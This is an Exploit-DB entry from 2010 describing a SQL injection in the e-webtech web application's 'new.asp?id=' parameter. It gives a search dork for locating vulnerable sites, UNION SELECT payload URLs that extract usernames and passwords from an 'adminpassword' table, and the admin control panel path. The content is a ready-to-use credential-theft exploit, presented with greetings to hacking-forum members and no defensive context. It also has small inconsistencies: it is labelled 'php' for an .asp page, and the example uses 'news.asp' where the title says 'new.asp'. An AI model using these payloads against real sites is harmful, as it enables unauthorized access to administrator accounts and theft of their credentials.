e-webtech new.asp?id= SQL Injection Vulnerability

2010-05-10T00:00:00
ID EDB-ID:12547
Type exploitdb
Reporter protocol
Modified 2010-05-10T00:00:00

Description

e-webtech (new.asp?id=) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ************************************************************
** (new.asp?id=) SQL Injection Vulnerability
************************************************************
** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** Risk: high
** Title: (new.asp?id=) SQL Injection Vulnerability
** Dork: "Powerd by www.e-webtech.com"
************************************************************
** Discovred by: protocol
** From : algeria
** Contact : pre@live.fr
** *********************************************************
** Greet to :
** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N
************************************************************
** Exploit:
**
** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword
**
**
** Column: username | password & pw
**
**
** Control Panel: http://localhost.com/controlpanel/login.asp
**
** Example:
**
**
** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
**
**
************************************************************